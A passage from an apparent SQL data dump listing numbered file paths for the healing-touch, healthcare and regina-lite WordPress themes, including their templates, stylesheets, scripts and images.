php'),(2202,'wp-content/themes/healing-touch/sidebar.php'),(2203,'wp-content/themes/healing-touch/single.php'),(2204,'wp-content/themes/healing-touch/style.css'),(2205,'wp-content/themes/healing-touch/woocommerce.php'),(2206,'wp-content/themes/healthcare/404.php'),(2207,'wp-content/themes/healthcare/admin/admin.css'),(2208,'wp-content/themes/healthcare/admin/admin.php'),(2209,'wp-content/themes/healthcare/admin/customizer.css'),(2210,'wp-content/themes/healthcare/admin/js/script.js'),(2211,'wp-content/themes/healthcare/archive.php'),(2212,'wp-content/themes/healthcare/author.php'),(2213,'wp-content/themes/healthcare/bg-css.php'),(2214,'wp-content/themes/healthcare/bootstrap/css/bootstrap-theme.css'),(2215,'wp-content/themes/healthcare/bootstrap/css/bootstrap-theme.css.map'),(2216,'wp-content/themes/healthcare/bootstrap/css/bootstrap-theme.min.css'),(2217,'wp-content/themes/healthcare/bootstrap/css/bootstrap.css'),(2218,'wp-content/themes/healthcare/bootstrap/css/bootstrap.css.map'),(2219,'wp-content/themes/healthcare/bootstrap/css/bootstrap.min.css'),(2220,'wp-content/themes/healthcare/bootstrap/js/bootstrap.js'),(2221,'wp-content/themes/healthcare/bootstrap/js/bootstrap.min.js'),(2222,'wp-content/themes/healthcare/bootstrap/js/npm.js'),(2223,'wp-content/themes/healthcare/category.php'),(2224,'wp-content/themes/healthcare/changelog.txt'),(2225,'wp-content/themes/healthcare/class-tgm-plugin-activation.php'),(2226,'wp-content/themes/healthcare/comment-function.php'),(2227,'wp-content/themes/healthcare/comments.php'),(2228,'wp-content/themes/healthcare/cover.php'),(2229,'wp-content/themes/healthcare/css/admin-rating.css'),(2230,'wp-content/themes/healthcare/css/animate.css'),(2231,'wp-content/themes/healthcare/css/color/blue.css'),(2232,'wp-content/themes/healthcare/css/custom.css'),(2233,'wp-content/themes/healthcare/css/customizer-range-value-control.css'),(2234,'wp-content/themes/healthcare/css/customizr.css'),(2235,'wp-content/themes/healthcare/css/font-awesome/HELP-US-OUT.txt'),(2236,'wp-content/themes/healthcare/css/font-awesome/css/font-awesome.css'),(2237,'wp-content/themes/healthcare/css/font-awesome/css/font-awesome.min.css'),(2238,'wp-content/themes/healthcare/css/font-awesome/css/font-awesome.min.css - Shortcut.lnk'),(2239,'wp-content/themes/healthcare/css/font-awesome/less/animated.less'),(2240,'wp-content/themes/healthcare/css/font-awesome/less/bordered-pulled.less'),(2241,'wp-content/themes/healthcare/css/font-awesome/less/core.less'),(2242,'wp-content/themes/healthcare/css/font-awesome/less/fixed-width.less'),(2243,'wp-content/themes/healthcare/css/font-awesome/less/font-awesome.less'),(2244,'wp-content/themes/healthcare/css/font-awesome/less/icons.less'),(2245,'wp-content/themes/healthcare/css/font-awesome/less/larger.less'),(2246,'wp-content/themes/healthcare/css/font-awesome/less/list.less'),(2247,'wp-content/themes/healthcare/css/font-awesome/less/mixins.less'),(2248,'wp-content/themes/healthcare/css/font-awesome/less/path.less'),(2249,'wp-content/themes/healthcare/css/font-awesome/less/rotated-flipped.less'),(2250,'wp-content/themes/healthcare/css/font-awesome/less/screen-reader.less'),(2251,'wp-content/themes/healthcare/css/font-awesome/less/stacked.less'),(2252,'wp-content/themes/healthcare/css/font-awesome/less/variables.less'),(2253,'wp-content/themes/healthcare/css/font-awesome/scss/_animated.scss'),(2254,'wp-content/themes/healthcare/css/font-awesome/scss/_bordered-pulled.scss'),(2255,'wp-content/themes/healthcare/css/font-awesome/scss/_core.scss'),(2256,'wp-content/themes/healthcare/css/font-awesome/scss/_fixed-width.scss'),(2257,'wp-content/themes/healthcare/css/font-awesome/scss/_icons.scss'),(2258,'wp-content/themes/healthcare/css/font-awesome/scss/_larger.scss'),(2259,'wp-content/themes/healthcare/css/font-awesome/scss/_list.scss'),(2260,'wp-content/themes/healthcare/css/font-awesome/scss/_mixins.scss'),(2261,'wp-content/themes/healthcare/css/font-awesome/scss/_path.scss'),(2262,'wp-content/themes/healthcare/css/font-awesome/scss/_rotated-flipped.scss'),(2263,'wp-content/themes/healthcare/css/font-awesome/scss/_screen-reader.scss'),(2264,'wp-content/themes/healthcare/css/font-awesome/scss/_stacked.scss'),(2265,'wp-content/themes/healthcare/css/font-awesome/scss/_variables.scss'),(2266,'wp-content/themes/healthcare/css/font-awesome/scss/font-awesome.scss'),(2267,'wp-content/themes/healthcare/css/media-query.css'),(2268,'wp-content/themes/healthcare/css/owl.carousel.css'),(2269,'wp-content/themes/healthcare/css/owl.theme.css'),(2270,'wp-content/themes/healthcare/css/prettyPhoto.css'),(2271,'wp-content/themes/healthcare/customizer.php'),(2272,'wp-content/themes/healthcare/footer.php'),(2273,'wp-content/themes/healthcare/front-page.php'),(2274,'wp-content/themes/healthcare/functions.php'),(2275,'wp-content/themes/healthcare/header.php'),(2276,'wp-content/themes/healthcare/home-blog.php'),(2277,'wp-content/themes/healthcare/home-slider.php'),(2278,'wp-content/themes/healthcare/images/6-light-box-facebook.jpg'),(2279,'wp-content/themes/healthcare/images/BeautySpa.jpg'),(2280,'wp-content/themes/healthcare/images/Comingsoon.jpg'),(2281,'wp-content/themes/healthcare/images/Enigma.jpg'),(2282,'wp-content/themes/healthcare/images/Healthcare-logo.png'),(2283,'wp-content/themes/healthcare/images/Healthcare.jpg'),(2284,'wp-content/themes/healthcare/images/Pinterest-Feed-Pro-WordPress-Plugin.jpg'),(2285,'wp-content/themes/healthcare/images/appointment-scheduler-pro.png'),(2286,'wp-content/themes/healthcare/images/arrows.svg'),(2287,'wp-content/themes/healthcare/images/fashionair-Responsive-WordPress-Premium-Theme.png'),(2288,'wp-content/themes/healthcare/images/footer-logo.png'),(2289,'wp-content/themes/healthcare/images/healthcare.png'),(2290,'wp-content/themes/healthcare/images/logo.png'),(2291,'wp-content/themes/healthcare/images/magnifier.png'),(2292,'wp-content/themes/healthcare/images/newsera01.png'),(2293,'wp-content/themes/healthcare/images/personal.png'),(2294,'wp-content/themes/healthcare/images/photo-pro.jpg'),(2295,'wp-content/themes/healthcare/images/portfolio/1.jpg'),(2296,'wp-content/themes/healthcare/images/portfolio/2.jpg'),(2297,'wp-content/themes/healthcare/images/portfolio/3.jpg'),(2298,'wp-content/themes/healthcare/images/portfolio/4.jpg'),(2299,'wp-content/themes/healthcare/images/responsive-photo-pro.jpg'),(2300,'wp-content/themes/healthcare/images/responsive-pro.jpg'),(2301,'wp-content/themes/healthcare/images/slider/slider1.jpg'),(2302,'wp-content/themes/healthcare/images/slider/slider2.jpg'),(2303,'wp-content/themes/healthcare/inc/customizer-page-editor/js/one-lite-text-editor.js'),(2304,'wp-content/themes/healthcare/index.php'),(2305,'wp-content/themes/healthcare/js/customizer-range-value-control.js'),(2306,'wp-content/themes/healthcare/js/jquery.prettyPhoto.js'),(2307,'wp-content/themes/healthcare/js/owl.carousel.js'),(2308,'wp-content/themes/healthcare/js/theme-scripts.js'),(2309,'wp-content/themes/healthcare/js/wow.js'),(2310,'wp-content/themes/healthcare/js/wow.min.js'),(2311,'wp-content/themes/healthcare/lang/en_IN.mo'),(2312,'wp-content/themes/healthcare/lang/en_IN.po'),(2313,'wp-content/themes/healthcare/menu/default_menu_walker.php'),(2314,'wp-content/themes/healthcare/menu/weblizar_nav_walker.php'),(2315,'wp-content/themes/healthcare/page.php'),(2316,'wp-content/themes/healthcare/post-content.php'),(2317,'wp-content/themes/healthcare/post-nocontent.php'),(2318,'wp-content/themes/healthcare/readme.txt'),(2319,'wp-content/themes/healthcare/screenshot.png'),(2320,'wp-content/themes/healthcare/search.php'),(2321,'wp-content/themes/healthcare/sidebar.php'),(2322,'wp-content/themes/healthcare/single.php'),(2323,'wp-content/themes/healthcare/style.css'),(2324,'wp-content/themes/healthcare/tag.php'),(2325,'wp-content/themes/healthcare/template-fullwidth.php'),(2326,'wp-content/themes/healthcare/template-home.php'),(2327,'wp-content/themes/healthcare/template-leftbar.php'),(2328,'wp-content/themes/index.php'),(2329,'wp-content/themes/regina-lite/CHANGELOG.txt'),(2330,'wp-content/themes/regina-lite/README.txt'),(2331,'wp-content/themes/regina-lite/archive.php'),(2332,'wp-content/themes/regina-lite/comments.php'),(2333,'wp-content/themes/regina-lite/footer.php'),(2334,'wp-content/themes/regina-lite/functions.php'),(2335,'wp-content/themes/regina-lite/gruntfile.js'),(2336,'wp-content/themes/regina-lite/header.php'),(2337,'wp-content/themes/regina-lite/home.php'),(2338,'wp-content/themes/regina-lite/inc/components/author-box/class-mtl-author-box-output.php'),(2339,'wp-content/themes/regina-lite/inc/components/breadcrumb/class-regina-breadcrumbs.php'),(2340,'wp-content/themes/regina-lite/inc/components/contact-bar/class-mtl-contact-bar-output.php'),(2341,'wp-content/themes/regina-lite/inc/components/entry-meta/class-mtl-entry-meta-output.php'),(2342,'wp-content/themes/regina-lite/inc/components/nav-walker/class-mtl-extended-menu-walker.php'),(2343,'wp-content/themes/regina-lite/inc/components/pagination/class-mtl-pagination-output.php'),(2344,'wp-content/themes/regina-lite/inc/components/related-posts/class-mtl-related-posts-output.php'),(2345,'wp-content/themes/regina-lite/inc/customizer/assets/css/customizer.css'),(2346,'wp-content/themes/regina-lite/inc/customizer/assets/css/preview.css'),(2347,'wp-content/themes/regina-lite/inc/customizer/assets/images/boxed.png'),(2348,'wp-content/themes/regina-lite/inc/customizer/assets/images/fullwidth.png'),(2349,'wp-content/themes/regina-lite/inc/customizer/assets/images/gray-lines.png'),(2350,'wp-content/themes/regina-lite/inc/customizer/assets/index.html'),(2351,'wp-content/themes/regina-lite/inc/customizer/assets/js/customizer.js'),(2352,'wp-content/themes/regina-lite/inc/customizer/assets/js/customizer_panel.js'),(2353,'wp-content/themes/regina-lite/inc/customizer/assets/js/jquery.scrollTo.js'),(2354,'wp-content/themes/regina-lite/inc/customizer/class-regina-lite-helper.php'),(2355,'wp-content/themes/regina-lite/inc/customizer/custom-controls/class-regina-custom-control.php'),(2356,'wp-content/themes/regina-lite/inc/customizer/custom-controls/class-regina-custom-panel.php'),(2357,'wp-content/themes/regina-lite/inc/customizer/custom-controls/class-regina-custom-setting.php'),(2358,'wp-content/themes/regina-lite/inc/customizer/custom-controls/class-regina-custom-upload.php'),(2359,'wp-content/themes/regina-lite/inc/customizer/custom-controls/class-regina-section-upsell.php'),(2360,'wp-content/themes/regina-lite/inc/customizer/custom-controls/class-regina-text-custom-control.php'),(2361,'wp-content/themes/regina-lite/inc/customizer/customizer-active-callbacks.php'),(2362,'wp-content/themes/regina-lite/inc/customizer/customizer.php'),(2363,'wp-content/themes/regina-lite/inc/customizer/index.html'),(2364,'wp-content/themes/regina-lite/inc/customizer/panels/advanced.php'),(2365,'wp-content/themes/regina-lite/inc/customizer/panels/blog.php'),(2366,'wp-content/themes/regina-lite/inc/customizer/panels/features.php'),(2367,'wp-content/themes/regina-lite/inc/customizer/panels/hero.php'),(2368,'wp-content/themes/regina-lite/inc/customizer/panels/news.php'),(2369,'wp-content/themes/regina-lite/inc/customizer/panels/our-team.php'),(2370,'wp-content/themes/regina-lite/inc/customizer/panels/site.php'),(2371,'wp-content/themes/regina-lite/inc/customizer/panels/speak.php'),(2372,'wp-content/themes/regina-lite/inc/customizer/panels/testimonials.php'),(2373,'wp-content/themes/regina-lite/inc/extras.php'),(2374,'wp-content/themes/regina-lite/inc/jetpack.php'),(2375,'wp-content/themes/regina-lite/inc/libraries/class-regina-notify-system.php'),(2376,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/LICENSE'),(2377,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/README.md'),(2378,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/color-picker.scss'),(2379,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/color-schemes.scss'),(2380,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/customizer-navigation.scss'),(2381,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/field-repeater.scss'),(2382,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/icon-picker.scss'),(2383,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/image.scss'),(2384,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/layouts.scss'),(2385,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/section-repeater-control.scss'),(2386,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/slider.scss'),(2387,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/toggle.scss'),(2388,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/tooltip.scss'),(2389,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/typography.scss'),(2390,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/upsell.scss'),(2391,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/sections/pro-section.scss'),(2392,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/sections/recommended-actions.scss'),(2393,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/sections/section-doubled.scss'),(2394,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/style-admin.css'),(2395,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/style-admin.scss'),(2396,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/style.css'),(2397,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/style.scss'),(2398,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/data/gfonts.json'),(2399,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/data/icons.json'),(2400,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/img/four-column.png'),(2401,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/img/one-column.png'),(2402,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/img/three-column.png'),(2403,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/img/two-column.png'),(2404,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/js/epsilon-admin.js'),(2405,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/js/epsilon-admin.min.js'),(2406,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/js/epsilon-previewer.js'),(2407,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/js/epsilon-previewer.min.js'),(2408,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/js/epsilon.js'),(2409,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/js/epsilon.min.js'),(2410,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/admin/components/epsilon-admin-object.js'),(2411,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/admin/components/notices.js'),(2412,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/admin/epsilon-admin.js'),(2413,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/color-picker/color-picker.js'),(2414,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/color-schemes/color-schemes.js'),(2415,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/customizer-navigation/customizer-navigation.js'),(2416,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/icon-picker/icon-picker.js'),(2417,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/image/image.js'),(2418,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/layouts/layouts.js'),(2419,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/range-slider/range-sliders.js'),(2420,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/repeater/repeater-base.js'),(2421,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/repeater/repeater-object.js'),(2422,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/repeater/repeater-row.js'),(2423,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/section-repeater/section-repeater-base.js'),(2424,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/section-repeater/section-repeater-object.js'),(2425,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/section-repeater/section-repeater-section.js'),(2426,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/text-editor/text-editor.js'),(2427,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/typography/typography.js'),(2428,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/epsilon-object.js'),(2429,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/panels/regular/regular.js'),(2430,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/sections/recommended-actions/recommended-actions.js'),(2431,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/sections/section-doubled/section-dobuled.js'),(2432,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/color-picker.js'),(2433,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/color-schemes.js'),(2434,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/customizer-navigation.js'),(2435,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/icon-picker.js'),(2436,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/image.js'),(2437,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/layouts.js'),(2438,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/range-sliders.js'),(2439,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/repeater.js'),(2440,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/section-repeater.js'),(2441,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/text-editor.js'),(2442,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/toggle.js'),(2443,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/typography.js'),(2444,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/upsell.js'),(2445,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/panels/regular.js'),(2446,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/sections/recommended-actions.js'),(2447,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/sections/section-doubled.js'),(2448,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/sections/section-pro.js'),(2449,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/epsilon.js'),(2450,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/previewer/components/color-schemes.js'),(2451,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/previewer/components/epsilon-previewer-object.js'),(2452,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/previewer/components/section-editor.js'),(2453,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/previewer/components/typography.js'),(2454,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/previewer/epsilon-previewer.js'),(2455,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/fontawesome/font-awesome.css'),(2456,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/fontawesome/font-awesome.min.css'),(2457,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/minicolors/jquery.minicolors.css'),(2458,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/minicolors/jquery.minicolors.js'),(2459,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/minicolors/jquery.minicolors.min.js'),(2460,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/minicolors/jquery.minicolors.png'),(2461,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/selectize/selectize.css'),(2462,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/selectize/selectize.js'),(2463,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/selectize/selectize.min.js'),(2464,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/changelog.txt'),(2465,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/class-epsilon-autoloader.php'),(2466,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/class-epsilon-framework.php'),(2467,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-color-coded-categories.php'),(2468,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-color-scheme.php'),(2469,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-content-backup.php'),(2470,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-customizer.php'),(2471,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-notifications.php'),(2472,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-notify-system.php'),(2473,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-repeater-templates.php'),(2474,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-sanitizers.php'),(2475,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-typography.php'),(2476,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-color-picker.php'),(2477,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-color-scheme.php'),(2478,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-customizer-navigation.php'),(2479,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-icon-picker.php'),(2480,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-image.php'),(2481,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-layouts.php'),(2482,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-repeater.php'),(2483,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-section-repeater.php'),(2484,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-slider.php'),(2485,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-text-editor.php'),(2486,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-toggle.php'),(2487,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-typography.php'),(2488,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-upsell.php'),(2489,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/panels/class-epsilon-panel-regular.php'),(2490,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/sections/class-epsilon-section-doubled.php'),(2491,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/sections/class-epsilon-section-pro.php'),(2492,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/sections/class-epsilon-section-recommended-actions.php'),(2493,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/settings/class-epsilon-setting-repeater.php'),(2494,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/gruntfile.js'),(2495,'wp-content/themes/regina-lite/inc/libraries/epsilon-framework/package.json'),(2496,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/assets/css/welcome.css'),(2497,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/assets/css/welcome_customizer.css'),(2498,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/assets/img/ajax-loader.gif'),(2499,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/assets/img/macho-themes-logo.svg'),(2500,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/assets/js/welcome.js'),(2501,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/class-regina-welcome-screen.php'),(2502,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/data/demo.json'),(2503,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/inc/class-epsilon-import-data.php'),(2504,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/sections/actions-required.php'),(2505,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/sections/features.php'),(2506,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/sections/getting-started.php'),(2507,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/sections/recommended-actions.php'),(2508,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/sections/recommended-plugins.php'),(2509,'wp-content/themes/regina-lite/inc/libraries/welcome-screen/sections/support.php'),(2510,'wp-content/themes/regina-lite/inc/next-compatible.php'),(2511,'wp-content/themes/regina-lite/inc/template-tags.php'),(2512,'wp-content/themes/regina-lite/index.php'),(2513,'wp-content/themes/regina-lite/layout/css/bootstrap.css'),(2514,'wp-content/themes/regina-lite/layout/css/bootstrap.min.css'),(2515,'wp-content/themes/regina-lite/layout/css/bxslider.css'),(2516,'wp-content/themes/regina-lite/layout/css/bxslider.min.css'),(2517,'wp-content/themes/regina-lite/layout/css/mobile.css'),(2518,'wp-content/themes/regina-lite/layout/css/mobile.css.map'),(2519,'wp-content/themes/regina-lite/layout/css/mobile.min.css'),(2520,'wp-content/themes/regina-lite/layout/css/owl-carousel.css'),(2521,'wp-content/themes/regina-lite/layout/css/owl-carousel.min.css'),(2522,'wp-content/themes/regina-lite/layout/css/owl-theme.css'),(2523,'wp-content/themes/regina-lite/layout/css/owl-theme.min.css'),(2524,'wp-content/themes/regina-lite/layout/css/owl-transitions.css'),(2525,'wp-content/themes/regina-lite/layout/css/owl-transitions.min.css'),(2526,'wp-content/themes/regina-lite/layout/css/pace.css'),(2527,'wp-content/themes/regina-lite/layout/css/pace.min.css'),(2528,'wp-content/themes/regina-lite/layout/css/styles.css'),(2529,'wp-content/themes/regina-lite/layout/css/styles.css.map'),(2530,'wp-content/themes/regina-lite/layout/css/styles.min.css'),(2531,'wp-content/themes/regina-lite/layout/images/bx_loader.gif'),(2532,'wp-content/themes/regina-lite/layout/images/controls.png'),(2533,'wp-content/themes/regina-lite/layout/images/home/slide-1.jpg'),(2534,'wp-content/themes/regina-lite/layout/images/home/testimonial-1.jpg'),(2535,'wp-content/themes/regina-lite/layout/images/home/testimonial-2.jpg'),(2536,'wp-content/themes/regina-lite/layout/images/home/testimonial-3.jpg'),(2537,'wp-content/themes/regina-lite/layout/images/home/testimonial-4.jpg'),(2538,'wp-content/themes/regina-lite/layout/images/home/testimonial-quote.jpg'),(2539,'wp-content/themes/regina-lite/layout/images/logo.png'),(2540,'wp-content/themes/regina-lite/layout/images/page-headers/blog.jpg'),(2541,'wp-content/themes/regina-lite/layout/images/team/team-member-1.jpg'),(2542,'wp-content/themes/regina-lite/layout/images/team/team-member-2.jpg'),(2543,'wp-content/themes/regina-lite/layout/images/team/team-member-3.jpg'),(2544,'wp-content/themes/regina-lite/layout/images/team/team-member-4.jpg'),(2545,'wp-content/themes/regina-lite/layout/js/custom.js'),(2546,'wp-content/themes/regina-lite/layout/js/custom.min.js'),(2547,'wp-content/themes/regina-lite/layout/js/custom.min.js.map'),(2548,'wp-content/themes/regina-lite/layout/js/plugins/bxslider/bxslider.js'),(2549,'wp-content/themes/regina-lite/layout/js/plugins/bxslider/bxslider.min.js'),(2550,'wp-content/themes/regina-lite/layout/js/plugins/bxslider/bxslider.min.js.map'),(2551,'wp-content/themes/regina-lite/layout/js/plugins/customizer/customizer.js'),(2552,'wp-content/themes/regina-lite/layout/js/plugins/customizer